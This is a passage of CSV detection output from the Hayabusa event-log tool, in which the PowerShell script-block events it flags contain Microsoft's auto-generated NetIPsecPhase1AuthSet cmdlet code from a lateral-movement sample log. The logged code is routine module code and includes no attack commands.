$PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecPhase1AuthSet' -Alias '*' function Set-NetIPsecPhase1AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecPhase1AuthSet' -Alias '*' function Remove-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/stand",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.514 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"eptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecPhase1AuthSet' -Alias '*' function Set-NetIPsecPhase1AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecPhase1AuthSet' -Alias '*' function Remove-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/stand",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.514 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] 